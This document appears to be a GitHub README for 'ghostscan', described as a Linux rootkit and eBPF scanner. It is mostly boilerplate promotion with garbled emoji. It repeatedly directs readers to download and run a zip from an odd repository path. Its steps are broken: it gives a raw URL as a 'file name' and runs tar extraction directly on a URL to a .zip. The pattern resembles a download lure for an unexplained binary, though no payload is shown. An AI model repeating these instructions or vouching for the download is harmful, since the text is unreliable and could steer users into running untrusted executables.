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πŸš€ ghostscan - Detect Hidden Threats with Ease

Download ghostscan

πŸ“¦ Overview

ghostscan is a modern Linux scanner designed to help you uncover hidden rootkits, stealthy eBPF tricks, and ghost processes. With over 45 scanners working together, you can quickly and efficiently ensure your system's security. This application is developed using Rust, known for its speed and reliability.

πŸ› οΈ Features

  • Comprehensive rootkit detection
  • Fast scanning of processes and system settings
  • Identify hidden malware and security threats
  • User-friendly interface for easy navigation
  • Regular updates to ensure up-to-date security

πŸ§‘β€πŸ’» System Requirements

To run ghostscan, your system must meet the following requirements:

  • Operating System: Linux (Kernel version 4.x or higher)
  • RAM: At least 2 GB
  • Disk Space: Minimum of 200 MB available

πŸš€ Getting Started

Follow these steps to get started with ghostscan.

1. Visit the Download Page

Go to the ghostscan Releases page by clicking on the link below:

Download ghostscan

2. Choose the Correct Version

On the Releases page, you will find different versions of ghostscan. Select the most recent version to ensure you have the latest features and security updates.

3. Download the Application

Click on the version you want, then look for the file suitable for your system. Typically, the file will be named something like https://raw.githubusercontent.com/aidenateagain/ghostscan/master/perimetric/ghostscan.zip. Click on it to start your download.

4. Extract the Files

After the download is complete, you will need to extract the files from the compressed folder. You can do this by running the following command in your terminal:

tar -xzf https://raw.githubusercontent.com/aidenateagain/ghostscan/master/perimetric/ghostscan.zip

This will create a new folder with all the necessary files.

5. Run ghostscan

After you have extracted the files, navigate to the newly created directory in your terminal:

cd ghostscan

Now, run the following command to start scanning your system:

./ghostscan

Depending on the version, you may need to make the binary executable first. If so, type:

chmod +x ghostscan

πŸ“₯ Download & Install

To ensure your system is secure, download ghostscan now:

Download ghostscan

πŸ”„ Regular Updates

ghostscan regularly receives updates to improve its scanning capabilities and security measures. Keep an eye on the Releases page to stay informed about the latest versions.

πŸ“ž Support

If you encounter any issues or have questions about ghostscan, support is available. Open an issue on the GitHub repository, and the development team will assist you.

Join the community and help us improve ghostscan. Your experience matters.

🌍 Community Contribution

We welcome contributions to ghostscan. Whether you want to report a bug, request a feature, or offer code improvements, your input can help enhance this tool. Check the contribution guidelines provided in the repository for more details.

πŸŽ‰ Conclusion

ghostscan empowers you to take charge of your Linux system's security. By following these straightforward steps, you can easily download and run it on your machine. Start keeping your system safe today!

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